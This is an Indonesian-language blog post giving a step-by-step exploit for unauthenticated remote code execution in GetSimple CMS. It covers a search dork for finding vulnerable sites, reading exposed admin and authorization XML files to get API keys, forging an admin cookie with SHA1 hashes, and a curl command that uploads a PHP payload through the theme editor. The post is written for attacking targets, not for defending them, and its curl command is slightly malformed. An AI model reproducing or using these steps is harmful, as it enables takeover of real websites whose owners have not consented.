GetSimple CMS Unauthenticated Remote Code Execution







> Referensi: https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
> NOTE KLO PASSWORD GK BISA DI HASH BARU MAKE CARA INI :V
> Dorking intext:"Powered By GetSimple"
> asumsikan gw udah pnya target nih :| masuk ke /data/users/admin.xml < si admin itu default ;v jadi gk semua xml nya admin ;v
Selanjutnya pergi ke /data/other/authorization.xml
Simpen dolo si USR sama si apikey di notepad :D
selanjutnya kita lihat version nya :D di /admin/index.php
Ambil version nya 3.1.2 ubah jadi 312 / apus . nya ;v < simpen di notepade dolo :D
Akses sha1 online :D bebas ;v hash text yg tadi di simpen di notepad di satuin dengan format getsimple_cookie_{version}{apikey} contoh getsimple_cookie_312oawkeoawkeok < hash


Simpen dolo hasil hash nya di notepad
lakukan hal yang sama ke USERAPIKEY 
Simpen si hasil hash
nah tinggal buat cookie :D
GS_ADMIN_USERNAME=user;HASH1=USERAPIKEY 



LETS EXPLOIT :D

Ambil Nonce :D

LETS UPLOAD FILE :D di sini gw pakek ssh ;v mls gw build nya di burp v;
curl -H "Cookie: COOKIE" -F "submitsave=2" -F "edited_file=FILENAME.php" -F "content=CONTENT" -F "nonce=NONCEhttp://site/dmin/theme-edit.php

Check Success or not? :V
akses site/theme/filename.php

Di content bisa di isiin payload php :D tapi klo make curl susah :D
- RINTOD -

0 Response to "GetSimple CMS Unauthenticated Remote Code Execution"

Post a Comment

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel